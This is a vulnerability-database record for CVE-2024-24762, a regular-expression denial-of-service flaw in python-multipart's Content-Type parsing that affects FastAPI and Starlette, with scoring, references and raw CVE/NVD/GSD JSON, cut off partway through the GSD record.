CVE-2024-24762 (GCVE-0-2024-24762)

Vulnerability from cvelistv5

Published

2024-02-05 14:33

Modified

2025-05-09 16:32

Severity ?

7.5 (High) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

CWE

CWE-400 - Uncontrolled Resource Consumption

Summary

`python-multipart` is a streaming multipart parser for Python. When using form data, `python-multipart` uses a Regular Expression to parse the HTTP `Content-Type` header, including options. An attacker could send a custom-made `Content-Type` option that is very difficult for the RegEx to process, consuming CPU resources and stalling indefinitely (minutes or more) while holding the main event loop. This means that process can't handle any more requests, leading to regular expression denial of service. This vulnerability has been patched in version 0.0.7.

References

►

URL

Tags

security-advisories@github.com	https://github.com/Kludex/python-multipart/commit/20f0ef6b4e4caf7d69a667c54dff57fe467109a4	Patch
security-advisories@github.com	https://github.com/Kludex/python-multipart/security/advisories/GHSA-2jv5-9r88-3w3p	Exploit, Vendor Advisory
security-advisories@github.com	https://github.com/andrew-d/python-multipart/blob/d3d16dae4b061c34fe9d3c9081d9800c49fc1f7a/multipart/multipart.py#L72-L74	Product
security-advisories@github.com	https://github.com/encode/starlette/commit/13e5c26a27f4903924624736abd6131b2da80cc5	Patch
security-advisories@github.com	https://github.com/encode/starlette/security/advisories/GHSA-93gm-qmq6-w238	Broken Link
security-advisories@github.com	https://github.com/tiangolo/fastapi/commit/9d34ad0ee8a0dfbbcce06f76c2d5d851085024fc	Patch
security-advisories@github.com	https://github.com/tiangolo/fastapi/releases/tag/0.109.1	Product
security-advisories@github.com	https://github.com/tiangolo/fastapi/security/advisories/GHSA-qf9m-vfgh-m389	Broken Link
af854a3a-2127-422b-91ae-364da2661108	https://github.com/Kludex/python-multipart/commit/20f0ef6b4e4caf7d69a667c54dff57fe467109a4	Patch
af854a3a-2127-422b-91ae-364da2661108	https://github.com/Kludex/python-multipart/security/advisories/GHSA-2jv5-9r88-3w3p	Exploit, Vendor Advisory
af854a3a-2127-422b-91ae-364da2661108	https://github.com/andrew-d/python-multipart/blob/d3d16dae4b061c34fe9d3c9081d9800c49fc1f7a/multipart/multipart.py#L72-L74	Product
af854a3a-2127-422b-91ae-364da2661108	https://github.com/encode/starlette/commit/13e5c26a27f4903924624736abd6131b2da80cc5	Patch
af854a3a-2127-422b-91ae-364da2661108	https://github.com/encode/starlette/security/advisories/GHSA-93gm-qmq6-w238	Broken Link
af854a3a-2127-422b-91ae-364da2661108	https://github.com/tiangolo/fastapi/commit/9d34ad0ee8a0dfbbcce06f76c2d5d851085024fc	Patch
af854a3a-2127-422b-91ae-364da2661108	https://github.com/tiangolo/fastapi/releases/tag/0.109.1	Product
af854a3a-2127-422b-91ae-364da2661108	https://github.com/tiangolo/fastapi/security/advisories/GHSA-qf9m-vfgh-m389	Broken Link

Impacted products

Vendor

Product

Version

►

Kludex

python-multipart

Version: 0

	tiangolo	fastapi	Version: 0
	encode	starlette	Version: 0

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-01T23:28:11.928Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "name": "https://github.com/Kludex/python-multipart/security/advisories/GHSA-2jv5-9r88-3w3p",
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "https://github.com/Kludex/python-multipart/security/advisories/GHSA-2jv5-9r88-3w3p"
          },
          {
            "name": "https://github.com/Kludex/python-multipart/commit/20f0ef6b4e4caf7d69a667c54dff57fe467109a4",
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://github.com/Kludex/python-multipart/commit/20f0ef6b4e4caf7d69a667c54dff57fe467109a4"
          },
          {
            "name": "https://github.com/tiangolo/fastapi/security/advisories/GHSA-qf9m-vfgh-m389",
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://github.com/tiangolo/fastapi/security/advisories/GHSA-qf9m-vfgh-m389"
          },
          {
            "name": "https://github.com/encode/starlette/security/advisories/GHSA-93gm-qmq6-w238",
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://github.com/encode/starlette/security/advisories/GHSA-93gm-qmq6-w238"
          },
          {
            "name": "https://github.com/andrew-d/python-multipart/blob/d3d16dae4b061c34fe9d3c9081d9800c49fc1f7a/multipart/multipart.py#L72-L74",
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://github.com/andrew-d/python-multipart/blob/d3d16dae4b061c34fe9d3c9081d9800c49fc1f7a/multipart/multipart.py#L72-L74"
          },
          {
            "name": "https://github.com/encode/starlette/commit/13e5c26a27f4903924624736abd6131b2da80cc5",
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://github.com/encode/starlette/commit/13e5c26a27f4903924624736abd6131b2da80cc5"
          },
          {
            "name": "https://github.com/tiangolo/fastapi/commit/9d34ad0ee8a0dfbbcce06f76c2d5d851085024fc",
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://github.com/tiangolo/fastapi/commit/9d34ad0ee8a0dfbbcce06f76c2d5d851085024fc"
          },
          {
            "name": "https://github.com/tiangolo/fastapi/releases/tag/0.109.1",
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://github.com/tiangolo/fastapi/releases/tag/0.109.1"
          }
        ],
        "title": "CVE Program Container"
      },
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-24762",
                "options": [
                  {
                    "Exploitation": "poc"
                  },
                  {
                    "Automatable": "yes"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-02-05T16:44:44.760876Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2025-05-09T16:32:50.015Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "collectionURL": "https://github.com/Kludex/python-multipart",
          "defaultStatus": "unaffected",
          "packageName": "python-multipart",
          "product": "python-multipart",
          "repo": "https://github.com/Kludex/python-multipart",
          "vendor": "Kludex",
          "versions": [
            {
              "lessThan": "0.0.7",
              "status": "affected",
              "version": "0",
              "versionType": "affected"
            }
          ]
        },
        {
          "collectionURL": "https://github.com/tiangolo/fastapi",
          "defaultStatus": "unaffected",
          "packageName": "fastapi",
          "product": "fastapi",
          "repo": "https://github.com/tiangolo/fastapi",
          "vendor": "tiangolo",
          "versions": [
            {
              "lessThan": "0.109.1",
              "status": "affected",
              "version": "0",
              "versionType": "affected"
            }
          ]
        },
        {
          "collectionURL": "https://github.com/encode/starlette",
          "defaultStatus": "unaffected",
          "packageName": "startlette",
          "product": "starlette",
          "repo": "https://github.com/encode/starlette",
          "vendor": "encode",
          "versions": [
            {
              "lessThan": "0.36.2",
              "status": "affected",
              "version": "0",
              "versionType": "affected"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "supportingMedia": [
            {
              "base64": false,
              "type": "text/html",
              "value": "`python-multipart` is a streaming multipart parser for Python. When using form data, `python-multipart` uses a Regular Expression to parse the HTTP `Content-Type` header, including options. An attacker could send a custom-made `Content-Type` option that is very difficult for the RegEx to process, consuming CPU resources and stalling indefinitely (minutes or more) while holding the main event loop. This means that process can\u0027t handle any more requests, leading to regular expression denial of service. This vulnerability has been patched in version 0.0.7."
            }
          ],
          "value": "`python-multipart` is a streaming multipart parser for Python. When using form data, `python-multipart` uses a Regular Expression to parse the HTTP `Content-Type` header, including options. An attacker could send a custom-made `Content-Type` option that is very difficult for the RegEx to process, consuming CPU resources and stalling indefinitely (minutes or more) while holding the main event loop. This means that process can\u0027t handle any more requests, leading to regular expression denial of service. This vulnerability has been patched in version 0.0.7."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "HIGH",
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "NONE",
            "integrityImpact": "NONE",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
            "version": "3.1"
          },
          "format": "CVSS",
          "scenarios": [
            {
              "lang": "en",
              "value": "GENERAL"
            }
          ]
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-400",
              "description": "CWE-400 Uncontrolled Resource Consumption",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2024-02-17T01:54:29.017Z",
        "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
        "shortName": "GitHub_M"
      },
      "references": [
        {
          "name": "https://github.com/Kludex/python-multipart/security/advisories/GHSA-2jv5-9r88-3w3p",
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://github.com/Kludex/python-multipart/security/advisories/GHSA-2jv5-9r88-3w3p"
        },
        {
          "name": "https://github.com/Kludex/python-multipart/commit/20f0ef6b4e4caf7d69a667c54dff57fe467109a4",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/Kludex/python-multipart/commit/20f0ef6b4e4caf7d69a667c54dff57fe467109a4"
        },
        {
          "name": "https://github.com/tiangolo/fastapi/security/advisories/GHSA-qf9m-vfgh-m389",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/tiangolo/fastapi/security/advisories/GHSA-qf9m-vfgh-m389"
        },
        {
          "name": "https://github.com/encode/starlette/security/advisories/GHSA-93gm-qmq6-w238",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/encode/starlette/security/advisories/GHSA-93gm-qmq6-w238"
        },
        {
          "name": "https://github.com/andrew-d/python-multipart/blob/d3d16dae4b061c34fe9d3c9081d9800c49fc1f7a/multipart/multipart.py#L72-L74",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/andrew-d/python-multipart/blob/d3d16dae4b061c34fe9d3c9081d9800c49fc1f7a/multipart/multipart.py#L72-L74"
        },
        {
          "name": "https://github.com/encode/starlette/commit/13e5c26a27f4903924624736abd6131b2da80cc5",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/encode/starlette/commit/13e5c26a27f4903924624736abd6131b2da80cc5"
        },
        {
          "name": "https://github.com/tiangolo/fastapi/commit/9d34ad0ee8a0dfbbcce06f76c2d5d851085024fc",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/tiangolo/fastapi/commit/9d34ad0ee8a0dfbbcce06f76c2d5d851085024fc"
        },
        {
          "name": "https://github.com/tiangolo/fastapi/releases/tag/0.109.1",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/tiangolo/fastapi/releases/tag/0.109.1"
        }
      ],
      "source": {
        "advisory": "GHSA-2jv5-9r88-3w3p",
        "discovery": "UNKNOWN"
      },
      "title": "python-multipart vulnerable to content-type header Regular expression Denial of Service",
      "x_generator": {
        "engine": "Vulnogram 0.1.0-dev"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
    "assignerShortName": "GitHub_M",
    "cveId": "CVE-2024-24762",
    "datePublished": "2024-02-05T14:33:06.481Z",
    "dateReserved": "2024-01-29T20:51:26.011Z",
    "dateUpdated": "2025-05-09T16:32:50.015Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1",
  "vulnerability-lookup:meta": {
    "nvd": "{\"cve\":{\"id\":\"CVE-2024-24762\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2024-02-05T15:15:09.260\",\"lastModified\":\"2025-05-05T14:14:26.363\",\"vulnStatus\":\"Analyzed\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"`python-multipart` is a streaming multipart parser for Python. When using form data, `python-multipart` uses a Regular Expression to parse the HTTP `Content-Type` header, including options. An attacker could send a custom-made `Content-Type` option that is very difficult for the RegEx to process, consuming CPU resources and stalling indefinitely (minutes or more) while holding the main event loop. This means that process can\u0027t handle any more requests, leading to regular expression denial of service. This vulnerability has been patched in version 0.0.7.\"},{\"lang\":\"es\",\"value\":\"FastAPI es un framework web para crear API con Python 3.8+ basado en sugerencias de tipo est\u00e1ndar de Python. Cuando se utilizan datos de formulario, `python-multipart` usa una expresi\u00f3n regular para analizar el encabezado HTTP `Content-Type`, incluidas las opciones. Un atacante podr\u00eda enviar una opci\u00f3n de \\\"Tipo de contenido\\\" personalizada que es muy dif\u00edcil de procesar para RegEx, consumiendo recursos de CPU y deteni\u00e9ndose indefinidamente (minutos o m\u00e1s) mientras se mantiene el bucle de evento principal. Esto significa que el proceso no puede manejar m\u00e1s solicitudes. Es un ReDoS (expresi\u00f3n regular de denegaci\u00f3n de servicio), solo se aplica a aquellos que leen datos del formulario usando `python-multipart`. Esta vulnerabilidad ha sido parcheada en la versi\u00f3n 0.109.0.\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\",\"baseScore\":7.5,\"baseSeverity\":\"HIGH\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"NONE\",\"integrityImpact\":\"NONE\",\"availabilityImpact\":\"HIGH\"},\"exploitabilityScore\":3.9,\"impactScore\":3.6},{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\",\"baseScore\":7.5,\"baseSeverity\":\"HIGH\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"NONE\",\"integrityImpact\":\"NONE\",\"availabilityImpact\":\"HIGH\"},\"exploitabilityScore\":3.9,\"impactScore\":3.6}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-400\"}]},{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-1333\"}]}],\"configurations\":[{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:fastapiexpert:python-multipart:*:*:*:*:*:python:*:*\",\"versionEndExcluding\":\"0.0.7\",\"matchCriteriaId\":\"F446019A-4E17-401B-865F-3AD3E2EB40AD\"}]}]},{\"operator\":\"AND\",\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:fastapiexpert:python-multipart:*:*:*:*:*:python:*:*\",\"versionEndExcluding\":\"0.0.7\",\"matchCriteriaId\":\"F446019A-4E17-401B-865F-3AD3E2EB40AD\"}]},{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":false,\"criteria\":\"cpe:2.3:a:encode:starlette:*:*:*:*:*:python:*:*\",\"versionEndExcluding\":\"0.36.2\",\"matchCriteriaId\":\"DE3FCFFD-84C3-4AF4-80CF-2FB38B78D1E0\"},{\"vulnerable\":false,\"criteria\":\"cpe:2.3:a:tiangolo:fastapi:*:*:*:*:*:*:*:*\",\"versionEndExcluding\":\"0.109.1\",\"matchCriteriaId\":\"8B47D84E-D97C-4E52-91AE-270FCFA34800\"}]}]}],\"references\":[{\"url\":\"https://github.com/Kludex/python-multipart/commit/20f0ef6b4e4caf7d69a667c54dff57fe467109a4\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Patch\"]},{\"url\":\"https://github.com/Kludex/python-multipart/security/advisories/GHSA-2jv5-9r88-3w3p\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Exploit\",\"Vendor Advisory\"]},{\"url\":\"https://github.com/andrew-d/python-multipart/blob/d3d16dae4b061c34fe9d3c9081d9800c49fc1f7a/multipart/multipart.py#L72-L74\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Product\"]},{\"url\":\"https://github.com/encode/starlette/commit/13e5c26a27f4903924624736abd6131b2da80cc5\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Patch\"]},{\"url\":\"https://github.com/encode/starlette/security/advisories/GHSA-93gm-qmq6-w238\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Broken Link\"]},{\"url\":\"https://github.com/tiangolo/fastapi/commit/9d34ad0ee8a0dfbbcce06f76c2d5d851085024fc\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Patch\"]},{\"url\":\"https://github.com/tiangolo/fastapi/releases/tag/0.109.1\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Product\"]},{\"url\":\"https://github.com/tiangolo/fastapi/security/advisories/GHSA-qf9m-vfgh-m389\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Broken Link\"]},{\"url\":\"https://github.com/Kludex/python-multipart/commit/20f0ef6b4e4caf7d69a667c54dff57fe467109a4\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Patch\"]},{\"url\":\"https://github.com/Kludex/python-multipart/security/advisories/GHSA-2jv5-9r88-3w3p\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Exploit\",\"Vendor Advisory\"]},{\"url\":\"https://github.com/andrew-d/python-multipart/blob/d3d16dae4b061c34fe9d3c9081d9800c49fc1f7a/multipart/multipart.py#L72-L74\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Product\"]},{\"url\":\"https://github.com/encode/starlette/commit/13e5c26a27f4903924624736abd6131b2da80cc5\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Patch\"]},{\"url\":\"https://github.com/encode/starlette/security/advisories/GHSA-93gm-qmq6-w238\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Broken Link\"]},{\"url\":\"https://github.com/tiangolo/fastapi/commit/9d34ad0ee8a0dfbbcce06f76c2d5d851085024fc\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Patch\"]},{\"url\":\"https://github.com/tiangolo/fastapi/releases/tag/0.109.1\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Product\"]},{\"url\":\"https://github.com/tiangolo/fastapi/security/advisories/GHSA-qf9m-vfgh-m389\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Broken Link\"]}]}}",
    "vulnrichment": {
      "containers": "{\"adp\": [{\"title\": \"CVE Program Container\", \"references\": [{\"url\": \"https://github.com/Kludex/python-multipart/security/advisories/GHSA-2jv5-9r88-3w3p\", \"name\": \"https://github.com/Kludex/python-multipart/security/advisories/GHSA-2jv5-9r88-3w3p\", \"tags\": [\"x_refsource_CONFIRM\", \"x_transferred\"]}, {\"url\": \"https://github.com/Kludex/python-multipart/commit/20f0ef6b4e4caf7d69a667c54dff57fe467109a4\", \"name\": \"https://github.com/Kludex/python-multipart/commit/20f0ef6b4e4caf7d69a667c54dff57fe467109a4\", \"tags\": [\"x_refsource_MISC\", \"x_transferred\"]}, {\"url\": \"https://github.com/tiangolo/fastapi/security/advisories/GHSA-qf9m-vfgh-m389\", \"name\": \"https://github.com/tiangolo/fastapi/security/advisories/GHSA-qf9m-vfgh-m389\", \"tags\": [\"x_refsource_MISC\", \"x_transferred\"]}, {\"url\": \"https://github.com/encode/starlette/security/advisories/GHSA-93gm-qmq6-w238\", \"name\": \"https://github.com/encode/starlette/security/advisories/GHSA-93gm-qmq6-w238\", \"tags\": [\"x_refsource_MISC\", \"x_transferred\"]}, {\"url\": \"https://github.com/andrew-d/python-multipart/blob/d3d16dae4b061c34fe9d3c9081d9800c49fc1f7a/multipart/multipart.py#L72-L74\", \"name\": \"https://github.com/andrew-d/python-multipart/blob/d3d16dae4b061c34fe9d3c9081d9800c49fc1f7a/multipart/multipart.py#L72-L74\", \"tags\": [\"x_refsource_MISC\", \"x_transferred\"]}, {\"url\": \"https://github.com/encode/starlette/commit/13e5c26a27f4903924624736abd6131b2da80cc5\", \"name\": \"https://github.com/encode/starlette/commit/13e5c26a27f4903924624736abd6131b2da80cc5\", \"tags\": [\"x_refsource_MISC\", \"x_transferred\"]}, {\"url\": \"https://github.com/tiangolo/fastapi/commit/9d34ad0ee8a0dfbbcce06f76c2d5d851085024fc\", \"name\": \"https://github.com/tiangolo/fastapi/commit/9d34ad0ee8a0dfbbcce06f76c2d5d851085024fc\", \"tags\": [\"x_refsource_MISC\", \"x_transferred\"]}, {\"url\": \"https://github.com/tiangolo/fastapi/releases/tag/0.109.1\", \"name\": \"https://github.com/tiangolo/fastapi/releases/tag/0.109.1\", \"tags\": [\"x_refsource_MISC\", \"x_transferred\"]}], \"providerMetadata\": {\"orgId\": \"af854a3a-2127-422b-91ae-364da2661108\", \"shortName\": \"CVE\", \"dateUpdated\": \"2024-08-01T23:28:11.928Z\"}}, {\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2024-24762\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"poc\"}, {\"Automatable\": \"yes\"}, {\"Technical Impact\": \"partial\"}], \"version\": \"2.0.3\", \"timestamp\": \"2024-02-05T16:44:44.760876Z\"}}}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2025-05-09T16:32:34.246Z\"}}], \"cna\": {\"title\": \"python-multipart vulnerable to content-type header Regular expression Denial of Service\", \"source\": {\"advisory\": \"GHSA-2jv5-9r88-3w3p\", \"discovery\": \"UNKNOWN\"}, \"metrics\": [{\"format\": \"CVSS\", \"cvssV3_1\": {\"scope\": \"UNCHANGED\", \"version\": \"3.1\", \"baseScore\": 7.5, \"attackVector\": \"NETWORK\", \"baseSeverity\": \"HIGH\", \"vectorString\": \"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\", \"integrityImpact\": \"NONE\", \"userInteraction\": \"NONE\", \"attackComplexity\": \"LOW\", \"availabilityImpact\": \"HIGH\", \"privilegesRequired\": \"NONE\", \"confidentialityImpact\": \"NONE\"}, \"scenarios\": [{\"lang\": \"en\", \"value\": \"GENERAL\"}]}], \"affected\": [{\"repo\": \"https://github.com/Kludex/python-multipart\", \"vendor\": \"Kludex\", \"product\": \"python-multipart\", \"versions\": [{\"status\": \"affected\", \"version\": \"0\", \"lessThan\": \"0.0.7\", \"versionType\": \"affected\"}], \"packageName\": \"python-multipart\", \"collectionURL\": \"https://github.com/Kludex/python-multipart\", \"defaultStatus\": \"unaffected\"}, {\"repo\": \"https://github.com/tiangolo/fastapi\", \"vendor\": \"tiangolo\", \"product\": \"fastapi\", \"versions\": [{\"status\": \"affected\", \"version\": \"0\", \"lessThan\": \"0.109.1\", \"versionType\": \"affected\"}], \"packageName\": \"fastapi\", \"collectionURL\": \"https://github.com/tiangolo/fastapi\", \"defaultStatus\": \"unaffected\"}, {\"repo\": \"https://github.com/encode/starlette\", \"vendor\": \"encode\", \"product\": \"starlette\", \"versions\": [{\"status\": \"affected\", \"version\": \"0\", \"lessThan\": \"0.36.2\", \"versionType\": \"affected\"}], \"packageName\": \"startlette\", \"collectionURL\": \"https://github.com/encode/starlette\", \"defaultStatus\": \"unaffected\"}], \"references\": [{\"url\": \"https://github.com/Kludex/python-multipart/security/advisories/GHSA-2jv5-9r88-3w3p\", \"name\": \"https://github.com/Kludex/python-multipart/security/advisories/GHSA-2jv5-9r88-3w3p\", \"tags\": [\"x_refsource_CONFIRM\"]}, {\"url\": \"https://github.com/Kludex/python-multipart/commit/20f0ef6b4e4caf7d69a667c54dff57fe467109a4\", \"name\": \"https://github.com/Kludex/python-multipart/commit/20f0ef6b4e4caf7d69a667c54dff57fe467109a4\", \"tags\": [\"x_refsource_MISC\"]}, {\"url\": \"https://github.com/tiangolo/fastapi/security/advisories/GHSA-qf9m-vfgh-m389\", \"name\": \"https://github.com/tiangolo/fastapi/security/advisories/GHSA-qf9m-vfgh-m389\", \"tags\": [\"x_refsource_MISC\"]}, {\"url\": \"https://github.com/encode/starlette/security/advisories/GHSA-93gm-qmq6-w238\", \"name\": \"https://github.com/encode/starlette/security/advisories/GHSA-93gm-qmq6-w238\", \"tags\": [\"x_refsource_MISC\"]}, {\"url\": \"https://github.com/andrew-d/python-multipart/blob/d3d16dae4b061c34fe9d3c9081d9800c49fc1f7a/multipart/multipart.py#L72-L74\", \"name\": \"https://github.com/andrew-d/python-multipart/blob/d3d16dae4b061c34fe9d3c9081d9800c49fc1f7a/multipart/multipart.py#L72-L74\", \"tags\": [\"x_refsource_MISC\"]}, {\"url\": \"https://github.com/encode/starlette/commit/13e5c26a27f4903924624736abd6131b2da80cc5\", \"name\": \"https://github.com/encode/starlette/commit/13e5c26a27f4903924624736abd6131b2da80cc5\", \"tags\": [\"x_refsource_MISC\"]}, {\"url\": \"https://github.com/tiangolo/fastapi/commit/9d34ad0ee8a0dfbbcce06f76c2d5d851085024fc\", \"name\": \"https://github.com/tiangolo/fastapi/commit/9d34ad0ee8a0dfbbcce06f76c2d5d851085024fc\", \"tags\": [\"x_refsource_MISC\"]}, {\"url\": \"https://github.com/tiangolo/fastapi/releases/tag/0.109.1\", \"name\": \"https://github.com/tiangolo/fastapi/releases/tag/0.109.1\", \"tags\": [\"x_refsource_MISC\"]}], \"x_generator\": {\"engine\": \"Vulnogram 0.1.0-dev\"}, \"descriptions\": [{\"lang\": \"en\", \"value\": \"`python-multipart` is a streaming multipart parser for Python. When using form data, `python-multipart` uses a Regular Expression to parse the HTTP `Content-Type` header, including options. An attacker could send a custom-made `Content-Type` option that is very difficult for the RegEx to process, consuming CPU resources and stalling indefinitely (minutes or more) while holding the main event loop. This means that process can\u0027t handle any more requests, leading to regular expression denial of service. This vulnerability has been patched in version 0.0.7.\", \"supportingMedia\": [{\"type\": \"text/html\", \"value\": \"`python-multipart` is a streaming multipart parser for Python. When using form data, `python-multipart` uses a Regular Expression to parse the HTTP `Content-Type` header, including options. An attacker could send a custom-made `Content-Type` option that is very difficult for the RegEx to process, consuming CPU resources and stalling indefinitely (minutes or more) while holding the main event loop. This means that process can\u0027t handle any more requests, leading to regular expression denial of service. This vulnerability has been patched in version 0.0.7.\", \"base64\": false}]}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-400\", \"description\": \"CWE-400 Uncontrolled Resource Consumption\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2024-02-17T01:54:29.017Z\"}}}",
      "cveMetadata": "{\"cveId\": \"CVE-2024-24762\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2025-05-09T16:32:50.015Z\", \"dateReserved\": \"2024-01-29T20:51:26.011Z\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"datePublished\": \"2024-02-05T14:33:06.481Z\", \"assignerShortName\": \"GitHub_M\"}",
      "dataType": "CVE_RECORD",
      "dataVersion": "5.1"
    }
  }
}

gsd-2024-24762

Vulnerability from gsd

Modified

2024-01-30 06:03

Details

FastAPI is a web framework for building APIs with Python 3.8+ based on standard Python type hints. When using form data, `python-multipart` uses a Regular Expression to parse the HTTP `Content-Type` header, including options. An attacker could send a custom-made `Content-Type` option that is very difficult for the RegEx to process, consuming CPU resources and stalling indefinitely (minutes or more) while holding the main event loop. This means that process can't handle any more requests. It's a ReDoS(Regular expression Denial of Service), it only applies to those reading form data, using `python-multipart`. This vulnerability has been patched in version 0.109.0.

Aliases

CVE-2024-24762

JSON

To clipboard

{
  "gsd": {
    "metadata": {
      "exploitCode": "unknown",
      "remediation": "unknown",
      "reportConfidence": "confirmed",
      "type": "vulnerability"
    },
    "osvSchema": {
      "aliases": [
        "CVE-2024-24762"
      ],
      "details": "FastAPI is a web framework for building APIs with Python 3.8+ based on standard Python type hints. When using form data, `python-multipart` uses a Regular Expression to parse the HTTP `Content-Type` header, including options. An attacker could send a custom-made `Content-Type` option that is very difficult for the RegEx to process, consuming CPU resources and stalling indefinitely (minutes or more) while holding the main event loop. This means that process can\u0027t handle any more requests. It\u0027s a ReDoS(Regular expression Denial of Service), it only applies to those reading form data, using `python-multipart`. This vulnerability has been patched in version 0.109.0.",
      "id": "GSD-2024-24762",
      "modified": "2024-01-30T06:03:12.565837Z",
      "schema_version": "1.4.0"
    }
  },
  "namespaces": {
    "cve.org": {
      "CVE_data_meta": {
        "ASSIGNER": "security-advisories@github.com",
        "ID": "CVE-2024-24762",
        "STATE": "PUBLIC"
      },
      "affects": {
        "vendor": {
          "vendor_data": [
            {
              "product": {
                "product_data": [
                  {
                    "product_name": "python-multipart",
                    "version": {
                      "version_data": [
                        {
                          "version_affected": "\u003c",
                          "version_name": "0",
                          "version_value": "0.0.7"
                        }
                      ]
                    }
                  }
                ]
              },
              "vendor_name": "Kludex"
            },
            {
              "product": {
